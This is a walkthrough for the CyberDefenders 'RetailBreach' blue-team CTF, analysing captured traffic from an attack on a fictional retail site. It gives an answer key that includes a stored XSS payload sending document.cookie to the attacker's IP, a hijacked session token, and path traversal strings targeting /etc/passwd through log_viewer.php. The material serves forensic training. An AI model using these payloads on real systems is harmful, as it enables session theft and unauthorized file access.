# RetailBreach
> Walkthrough
+ categories: [traffic-analysis, malicious-traffic]
+ source: [CybersDefenderos](https://cyberdefenders.org/blueteam-ctf-challenges/retailbreach/)

## Overview
As a cybersecurity analyst at ShopSphere, an online retail platform, you play a key role in safeguarding the digital storefront and ensuring a secure shopping experience for millions of users worldwide. Your expertise is crucial in identifying vulnerabilities and protecting the company's assets and customer information from potential threats.

Following an unusual pattern of administrative logins late at night, the cybersecurity team has been prompted to launch an investigation. These unusual logins hint at a potential breach alongside incoming customer complaints regarding account anomalies.

Your task is to analyze the network traffic captured to identify the nature and source of the potential breach. Your findings will be crucial in mitigating the impact of the breach and fortifying ShopSphere's defenses against future attacks.

**Tools:**  
+ Wireshark
+ Network Miner
+ Brim

---

**Q1:** In the realm of cybersecurity, identifying the attacker's IP address is pivotal for mapping the attack's scope and strategizing an effective response. What is the IP address associated with the attacker?   
**A:** '111.224.180.128'  

**Q2:** Directory brute-forcing tools are known to be used by attackers seeking to uncover hidden paths within web applications. Which tool was employed by the attacker to perform directory brute-forcing?  
**A:** 'gobuster'  

![](../../images/retailbreach_gobuster.png)  



**Q3:** Cross-Site Scripting (XSS) allows attackers to inject malicious scripts into web pages viewed by users. Could you specify the XSS payload that was utilized by the attacker to compromise the web application's integrity?   
**A:**  `<script>fetch('http://111.224.180.128/' + document.cookie);</script>`    

Comment and review sections on a website are common areas for XSS (Cross-Site Scripting) payloads. If these sections do not have proper sanitization, the application is at risk of stored or reflected XSS vulnerabilities. Knowing this, we can filter our traffic for POST requests using `http.request.method == 'POST'`.   
![](../../images/retailbreach_XSS_Payload.png)

Looking at the POST request we can see that `<script>fetch('http://111.224.180.128/' + document.cookie);</script>` was submitted as input. The fetch() function sends an HTTP request to the URL http://111.224.180.128/ with the current webpage's cookies appended to it. Whenever a user visits 'http://shopsphere.com' and signs-in, a copy of their cookie is sent to '111.224.180.128' allowing the culprit to hijack their session.

**Q4:** Pinpointing the exact moment an admin user encounters the injected malicious script is crucial for understanding the timeline of a security breach. Can you provide the UTC timestamp when the admin user first visited the page containing the injected malicious script?  
**A:**  '29-03-2024 12:09:50'  
![](../../images/retailbreach_ioc.png)   

**Q5:** The act of stealing a session token via XSS is a critical security breach, enabling unauthorized access. Can you provide the session token acquired and used by the attacker for unauthorized access?   
**A:** 'lqkctf24s9h9lg67teu8uevn3q'  

At **12:11:04** the culprit receives a request from the fetch() function with a copy of the admin's cookie. The culprit updates the cookie value and replaces it with 'lqkctf24s9h9lg67teu8uevn3q' allowing him to impersonate the victim.

![](../../images/retailbreach_seshhijack.png)  


**Q6:** Identifying which scripts have been exploited is a key step in mitigating vulnerabilities within a web application. What is the name of the script that was exploited by the attacker?  
**A:** 'log_viewer.php'  

**12:11:45:** Accessed /admin/log_viewer.php.  
**12:11:51:** Accessed /admin/log_viewer.php?file=error.log. 
>This is an attempt to view the error.log file, indicating potential reconnaissance to find sensitive information.  

**12:12:12:** Attempted path traversal with /admin/log_viewer.php?file=../../../../etc/passwd.
> This is a direct attempt to access the /etc/passwd file, which contains user account information.

**Q7:** Exploiting vulnerabilities to access sensitive system files is a common tactic among attackers. Can you identify the payload that was used by the attacker to gain access to a sensitive system file?  
**A:** '../../../../../etc/passwd'  

![](../../images/retailbreach_pathtrav.png)




